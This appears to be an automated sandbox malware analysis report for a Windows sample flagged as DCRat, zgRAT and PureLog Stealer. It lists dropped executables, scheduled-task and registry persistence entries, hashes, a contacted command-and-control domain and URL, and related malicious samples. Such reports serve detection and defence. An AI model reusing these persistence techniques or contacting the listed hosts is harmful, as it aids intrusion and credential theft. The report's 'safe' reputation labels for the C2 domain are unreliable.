                              C:\Program Files (x86)\Java\jre-1.8\upfc.exe100%AviraHEUR/AGEN.1323342
                              C:\Users\user\Desktop\rUKsZmvt.log100%AviraTR/PSW.Agent.qngqt
                              C:\Program Files (x86)\Java\jre-1.8\upfc.exe100%Joe Sandbox ML
                              C:\Recovery\llflCdrMcgGB.exe100%Joe Sandbox ML
                              C:\Recovery\llflCdrMcgGB.exe100%Joe Sandbox ML
                              C:\Users\user\Desktop\PDlWdMMS.log100%Joe Sandbox ML
                              C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exe100%Joe Sandbox ML
                              C:\Users\user\Desktop\wlyrJHCD.log100%Joe Sandbox ML
                              C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe100%Joe Sandbox ML
                              C:\Program Files (x86)\Java\jre-1.8\upfc.exe100%Joe Sandbox ML
                              C:\Users\user\Desktop\AHphtSeX.log100%Joe Sandbox ML
                              C:\Users\user\Desktop\rUKsZmvt.log100%Joe Sandbox ML
                              C:\Program Files (x86)\Java\jre-1.8\upfc.exe73%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Program Files\7-Zip\Lang\upfc.exe73%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exe73%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Recovery\llflCdrMcgGB.exe73%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Users\user\Desktop\AHphtSeX.log8%ReversingLabs
                              C:\Users\user\Desktop\CUcqaUVf.log17%ReversingLabs
                              C:\Users\user\Desktop\FUSHtkHk.log17%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Users\user\Desktop\PDlWdMMS.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Users\user\Desktop\YPnuykix.log17%ReversingLabs
                              C:\Users\user\Desktop\jjSkKJFG.log17%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Users\user\Desktop\rUKsZmvt.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Users\user\Desktop\wlyrJHCD.log8%ReversingLabs
                              C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe73%ReversingLabsByteCode-MSIL.Trojan.DCRat

                              Unpacked PE Files

                              No Antivirus matches

                              Domains

                              No Antivirus matches

                              URLs

                              SourceDetectionScannerLabelLink
                              https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                              https://www.ecosia.org/newtab/0%URL Reputationsafe
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                              https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
                              https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
                              http://podval.top/0%Avira URL Cloudsafe
                              https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
                              http://podval.top/LineToPythonJsLowupdateLongpollWindowsFlower.php0%Avira URL Cloudsafe
                              http://podval.top0%Avira URL Cloudsafe

                              Domains and IPs

                              Contacted Domains

                              NameIPActiveMaliciousAntivirus DetectionReputation
                              podval.top
                              		188.114.97.3
                              		truetrue
                                		unknown

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                http://podval.top/LineToPythonJsLowupdateLongpollWindowsFlower.phptrue
                                • Avira URL Cloud: safe
                                		unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                https://ac.ecosia.org/autocomplete?q=upfc.exe, 00000011.00000002.2507201386.0000000013453000.00000004.00000800.00020000.00000000.sdmp, RQxNQiaB3w.17.dr, Ld3wQv6XcO.17.drfalse
                                • URL Reputation: safe
                                		unknown
                                https://duckduckgo.com/chrome_newtabupfc.exe, 00000011.00000002.2507201386.0000000013453000.00000004.00000800.00020000.00000000.sdmp, RQxNQiaB3w.17.dr, Ld3wQv6XcO.17.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://duckduckgo.com/ac/?q=upfc.exe, 00000011.00000002.2507201386.0000000013453000.00000004.00000800.00020000.00000000.sdmp, RQxNQiaB3w.17.dr, Ld3wQv6XcO.17.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://www.google.com/images/branding/product/ico/googleg_lodp.icoupfc.exe, 00000011.00000002.2507201386.0000000013453000.00000004.00000800.00020000.00000000.sdmp, RQxNQiaB3w.17.dr, Ld3wQv6XcO.17.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://podval.top/upfc.exe, 00000011.00000002.2485222023.0000000003076000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchupfc.exe, 00000011.00000002.2507201386.0000000013453000.00000004.00000800.00020000.00000000.sdmp, RQxNQiaB3w.17.dr, Ld3wQv6XcO.17.drfalse
                                • URL Reputation: safe
                                		unknown
                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=upfc.exe, 00000011.00000002.2507201386.0000000013453000.00000004.00000800.00020000.00000000.sdmp, RQxNQiaB3w.17.dr, Ld3wQv6XcO.17.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=upfc.exe, 00000011.00000002.2507201386.0000000013453000.00000004.00000800.00020000.00000000.sdmp, RQxNQiaB3w.17.dr, Ld3wQv6XcO.17.drfalse
                                • URL Reputation: safe
                                		unknown
                                https://www.ecosia.org/newtab/upfc.exe, 00000011.00000002.2507201386.0000000013453000.00000004.00000800.00020000.00000000.sdmp, RQxNQiaB3w.17.dr, Ld3wQv6XcO.17.drfalse
                                • URL Reputation: safe
                                		unknown
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, 00000000.00000002.1298963270.00000000030A6000.00000004.00000800.00020000.00000000.sdmp, 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, 00000000.00000002.1298963270.0000000002A8C000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000011.00000002.2485222023.0000000003076000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=upfc.exe, 00000011.00000002.2507201386.0000000013453000.00000004.00000800.00020000.00000000.sdmp, RQxNQiaB3w.17.dr, Ld3wQv6XcO.17.drfalse
                                • URL Reputation: safe
                                		unknown
                                http://podval.topupfc.exe, 00000011.00000002.2485222023.000000000368E000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000011.00000002.2485222023.0000000003348000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000011.00000002.2485222023.0000000003076000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000011.00000002.2485222023.00000000034FF000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000011.00000002.2485222023.000000000378E000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                188.114.97.3
                                		podval.topEuropean Union
                                		13335CLOUDFLARENETUStrue

                                General Information

                                Joe Sandbox version:40.0.0 Tourmaline
                                Analysis ID:1467031
                                Start date and time:2024-07-03 16:41:09 +02:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 9m 18s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:46
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                                Detection:MAL
                                Classification:mal100.spre.troj.spyw.expl.evad.winEXE@42/58@1/1
                                EGA Information:
                                • Successful, ratio: 22.2%
                                HCA Information:Failed
                                Cookbook Comments:
                                • Found application associated with file extension: .exe

                                Warnings

                                • Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, Sgrmuserer.exe, schtasks.exe, svchost.exe
                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                • Execution Graph export aborted for target 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, PID 1472 because it is empty
                                • Execution Graph export aborted for target 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, PID 7996 because it is empty
                                • Execution Graph export aborted for target StartMenuExperienceHost.exe, PID 7196 because it is empty
                                • Execution Graph export aborted for target StartMenuExperienceHost.exe, PID 7364 because it is empty
                                • Execution Graph export aborted for target llflCdrMcgGB.exe, PID 7296 because it is empty
                                • Execution Graph export aborted for target llflCdrMcgGB.exe, PID 8152 because it is empty
                                • Execution Graph export aborted for target upfc.exe, PID 6764 because it is empty
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                • Report size getting too big, too many NtOpenFile calls found.
                                • Report size getting too big, too many NtOpenKey calls found.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                • VT rate limit hit for: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                10:42:09API Interceptor2168872x Sleep call for process: upfc.exe modified
                                16:42:00Task SchedulerRun new task: upfc path: "C:\Program Files (x86)\java\jre-1.8\upfc.exe"
                                16:42:01Task SchedulerRun new task: upfcu path: "C:\Program Files (x86)\java\jre-1.8\upfc.exe"
                                16:42:03Task SchedulerRun new task: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab path: "C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe"
                                16:42:03Task SchedulerRun new task: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab6 path: "C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe"
                                16:42:03Task SchedulerRun new task: llflCdrMcgGB path: "C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe"
                                16:42:03Task SchedulerRun new task: llflCdrMcgGBl path: "C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe"
                                16:42:03Task SchedulerRun new task: StartMenuExperienceHost path: "C:\Users\All Users\Application Data\Start Menu\StartMenuExperienceHost.exe"
                                16:42:03AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run upfc "C:\Program Files\7-Zip\Lang\upfc.exe"
                                16:42:04Task SchedulerRun new task: StartMenuExperienceHostS path: "C:\Users\All Users\Application Data\Start Menu\StartMenuExperienceHost.exe"
                                16:42:11AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run llflCdrMcgGB "C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe"
                                16:42:20AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run StartMenuExperienceHost "C:\Users\All Users\Application Data\Start Menu\StartMenuExperienceHost.exe"
                                16:42:28AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab "C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe"
                                16:42:36AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run upfc "C:\Program Files\7-Zip\Lang\upfc.exe"
                                16:42:44AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run llflCdrMcgGB "C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe"
                                16:42:52AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run StartMenuExperienceHost "C:\Users\All Users\Application Data\Start Menu\StartMenuExperienceHost.exe"
                                16:43:00AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab "C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe"
                                16:43:08AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run upfc "C:\Program Files\7-Zip\Lang\upfc.exe"
                                16:43:16AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run llflCdrMcgGB "C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe"
                                16:43:24AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run StartMenuExperienceHost "C:\Users\All Users\Application Data\Start Menu\StartMenuExperienceHost.exe"
                                16:43:32AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab "C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe"
                                16:43:49AutostartRun: WinLogon Shell "C:\Program Files (x86)\java\jre-1.8\upfc.exe"
                                16:43:57AutostartRun: WinLogon Shell "C:\Recovery\llflCdrMcgGB.exe"
                                16:44:05AutostartRun: WinLogon Shell "C:\Users\All Users\Application Data\Start Menu\StartMenuExperienceHost.exe"

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                188.114.97.3MUdeeReQ5R.exeGet hashmaliciousFormBookBrowse
                                • www.ilodezu.com/z48v/
                                RR1h1iO6W2.exeGet hashmaliciousFormBookBrowse
                                • www.intervisitation.sbs/clrm/
                                aAEsSBx24sxHhRz.exeGet hashmaliciousFormBookBrowse
                                • www.fin4d-sl.com/dy13/?GdIHAFZ=MC4QZEftrgtCVvoYAYxBXZxxSCJu24Hzj16GKJrL5MOAuB5Jt3GFkekm4l21S7hYr6F9&BhU=5jl0ddZhNnYlOrV0
                                http://sp.26skins.com/steamstore/category/action_run_jump/?snr=1_1530_4__12Get hashmaliciousUnknownBrowse
                                • sp.26skins.com/favicon.ico
                                Inquiry No PJO-4010574.exeGet hashmaliciousFormBookBrowse
                                • www.oc7o0.top/2zff/?iHmHOtK=4L8xoD0W4Zo4sy88OPxzXkM4Et1OXrliZZOBxyE5jHDJEgkxN8cq+PG6NIXzy1XRCqQIvL5VyJCknvUNNLKk7znic/DfJyEGJbg1Pv28u2ofuxZkWteJjYs=&L480=nFsp
                                30Fqen2Bu3.exeGet hashmaliciousUnknownBrowse
                                • filetransfer.io/data-package/TbaYPT0S/download
                                nJ8mJTmMf0.exeGet hashmaliciousFormBookBrowse
                                • www.coinwab.com/efdt/
                                hkLFB22XxS.exeGet hashmaliciousFormBookBrowse
                                • www.cavetta.org.mt/yhnb/
                                QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                • filetransfer.io/data-package/mJcm5Gfa/download
                                http://url.usb.m.mimecastprotect.com/s/SPnzCDwVznT7kyA0HkOsZj?domain=linkscan.ioGet hashmaliciousHTMLPhisherBrowse
                                • emmalee.sa.com/favicon.ico

                                Domains

                                No context

                                ASNs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                CLOUDFLARENETUSGJRX21GBj3.exeGet hashmaliciousFormBookBrowse
                                • 23.227.38.74
                                7vwfhMuUQg.exeGet hashmaliciousSnake KeyloggerBrowse
                                • 188.114.96.3
                                http://booking.extnnehotteir.com/admin/o2shi1bka89Get hashmaliciousUnknownBrowse
                                • 188.114.96.3
                                j6OUc3S2uP.exeGet hashmaliciousSnake KeyloggerBrowse
                                • 188.114.96.3
                                7vwfhMuUQg.exeGet hashmaliciousSnake KeyloggerBrowse
                                • 188.114.96.3
                                MUdeeReQ5R.exeGet hashmaliciousFormBookBrowse
                                • 172.67.147.144
                                q86onx3LvU.exeGet hashmaliciousPureLog StealerBrowse
                                • 104.21.10.178
                                Vertex Business Services_SKM_C950633210_650106.pdfGet hashmaliciousHTMLPhisherBrowse
                                • 104.17.2.184
                                6Ek4nfs2y1.exeGet hashmaliciousPhoenixKeylogger, PureLog StealerBrowse
                                • 104.21.10.178
                                9098393827383039.exeGet hashmaliciousFormBookBrowse
                                • 188.114.96.3

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                C:\Users\user\Desktop\AHphtSeX.logVg46FzGtNo.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                  6Z4Q4bREii.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                    BbaXbvOA7D.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                      cL7A9wGE3w.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                        j05KsN2280.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                          2lR1Spui9w.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                            b8khu7cOny.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                              hnCn8gE6NH.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                l4R8w1Q8lC.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                  yF4L47gYLd.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse

                                                    Created / dropped Files

                                                    C:\Program Files (x86)\Java\jre-1.8\ea1d8f6d871115

                                                    Download File
                                                    Process:C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):154
                                                    Entropy (8bit):5.72287826517413
                                                    Encrypted:false
                                                    SSDEEP:3:mm3xh0oLaLCWYMIiTzXIE7fqzSEqTEI0ZcgBiG0m1zJ/As88h/EBArCMUxcJ5:mmBqdIifXPft83cYDH/AFa02
                                                    MD5:B9A2A12C63F87F9BAB05FE1BA859AEEF
                                                    SHA1:E9F38EE202F6975E13BA61F94ADE174813047448
                                                    SHA-256:D7009E1F0F4685A88D69A253EF611052E646FDB430390C9DB53E22AD468AEF51
                                                    SHA-512:E24F602ADCAC629C11087781AF30FD230C4DCEF80948CF78BE1E823491ECBC5DE21EA050A00C5C274379974AA9CD7A7DA1CE31F4B06B681871B760F40D42390B
                                                    Malicious:false
                                                    Preview:9rCcHIrTDVZdGvwKMXRDujMqhrgB3KAAC1zvmmG0Bd7erm18a7EH3sYafV5alpZ2VYaO6AhkRaCQlr940il6F2GUdZQQqqPVDEJSMmCaZe0cpHyxWBjDEdxcSFugtR3lLrNgiqsOfLhkBnoVkd3pGLRkRq

                                                    C:\Program Files (x86)\Java\jre-1.8\upfc.exe

                                                    Download File
                                                    Process:C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):1912832
                                                    Entropy (8bit):7.536317571621779
                                                    Encrypted:false
                                                    SSDEEP:49152:e+HfOkJKSCClPSW07CC7db1s8qOZcWe8mLP1:e+/PJK9Cj67vXmLd
                                                    MD5:6667F954763EEACF7EFFCF5A5C25E695
                                                    SHA1:6DB1FBA1CD1181B921CDADEBA24C69CD680BE825
                                                    SHA-256:62B1BF60394248D2C743EC6DF0935D58E5009C9E04AAB52DA72AD712A57597B4
                                                    SHA-512:9CC3525D7B7926CAA3017FFC91E3262429C74A03C9BE10037D1BF416EE7DE812D60E2B1AFD87DFE1D5B2ECE3A21CFC4CACD4E79F0152AECC3E421F1996599D20
                                                    Malicious:true
                                                    Yara Hits:
                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe, Author: Joe Security
                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe, Author: Joe Security
                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe, Author: Joe Security
                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe, Author: Joe Security
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 73%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Q}f.................(...........F... ...`....@.. ....................................@..................................F..K....`.. ............................................................................ ............... ..H............text....'... ...(.................. ..`.rsrc... ....`.......*..............@....reloc..............................@..B.................F......H.......0...x...............pj..-F.......................................0..........(.... ........8........E........N...*...)...8....(.... ....~j...{....:....& ....8....*(.... ....~j...{....:....& ....8....(.... ....~j...{v...:....& ....8y......0.......... ........8........E....;...........`...l...86...~....(C... .... .... ....s....~....(G....... ....8.......... ....~j...{....:....& ....8....r...ps....z*....~....(K...~....(O... ....?.... ....8O...~....:.... ....~j...{....91..

                                                    C:\Program Files (x86)\Java\jre-1.8\upfc.exe:Zone.Identifier

                                                    Download File
                                                    Process:C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):26
                                                    Entropy (8bit):3.95006375643621
                                                    Encrypted:false
                                                    SSDEEP:3:ggPYV:rPYV
                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                    Malicious:true
                                                    Preview:[ZoneTransfer]....ZoneId=0

                                                    C:\Program Files (x86)\Microsoft\Edge\Application\CSC76655AD3B5B14A58A99CB3ECAE1D1A90.TMP

                                                    Download File
                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                    File Type:MSVC .res
                                                    Category:dropped
                                                    Size (bytes):1168
                                                    Entropy (8bit):4.448520842480604
                                                    Encrypted:false
                                                    SSDEEP:24:mZxT0uZhNB+h9PNnqNdt4+lEbNFjMyi07:yuulB+hnqTSfbNtme
                                                    MD5:B5189FB271BE514BEC128E0D0809C04E
                                                    SHA1:5DD625D27ED30FCA234EC097AD66F6C13A7EDCBE
                                                    SHA-256:E1984BA1E3FF8B071F7A320A6F1F18E1D5F4F337D31DC30D5BDFB021DF39060F
                                                    SHA-512:F0FCB8F97279579BEB59F58EA89527EE0D86A64C9DE28300F14460BEC6C32DDA72F0E6466573B6654A1E992421D6FE81AE7CCE50F27059F54CF9FDCA6953602E
                                                    Malicious:false
                                                    Preview:.... ...........................D...<...............0...........D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.e...m.s.e.d.g.e...e.x.e.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...@.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.s.e.d.g.e...e.x.e.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <security>.. <requestedPrivileges xmlns="urn:schemas-micro

                                                    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

                                                    Download File
                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):4608
                                                    Entropy (8bit):3.912573812782283
                                                    Encrypted:false
                                                    SSDEEP:48:6CmdtFxZ8RxeOAkFJOcV4MKe28d4dZvqBH3uulB+hnqXSfbNtm:cyxvxVx9AvkpTkZzNt
                                                    MD5:707BBE530438ABD168AC55A01E36E76A
                                                    SHA1:FEF3C858D781FB0749A426E008820C6E90570B16
                                                    SHA-256:27712AB94F0571F97AFEEFB59EBA8708015D956D811DC4B0CCEEA74DAD43B806
                                                    SHA-512:9E105C83FFBA1C9FC20F028D8E5CF5D1E6CC4013F15A207CB67D3D9240976876B4D790F8FFAA940A155488C9E96741B028C28FA1B83A01487CFA0B3F53522C60
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....q.f.............................'... ...@....@.. ....................................@.................................T'..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..,.............................................................(....*.0..!.......r...pr...p.{....(....(....&..&..*....................0..........r...p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings............#US.........#GUID....... ...#Blob...........WU........%3................................................................

                                                    C:\Program Files\7-Zip\Lang\ea1d8f6d871115

                                                    Download File
                                                    Process:C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                                                    File Type:ASCII text, with very long lines (910), with no line terminators
                                                    Category:dropped
                                                    Size (bytes):910
                                                    Entropy (8bit):5.905591865684524
                                                    Encrypted:false
                                                    SSDEEP:24:XmM4dDGyu1kb7xm60iYswI8d/MiTLfnt4sAG1jiFEQg7d7k06:+16kb7xm1jIsVPt4XG1jiNg7tV6
                                                    MD5:3A3D7869D8944FFFB319B9BB32F08710
                                                    SHA1:C30671C1F0F3DB0220F467D0B62BCEF9FB4A14E9
                                                    SHA-256:B1D0F5C991BA5CDA6D316EC07F3400DD04518DB29E0784544CAD0C8D4A30429D
                                                    SHA-512:ACE056342A78F0C83B2AE2E3594F3AC6951F902DE5DA54CFF2F953E02F1492039981407213D319E89F00AF4F79DCA401DED29D8D3538E12A04B4C60D2AE03CFE
                                                    Malicious:false
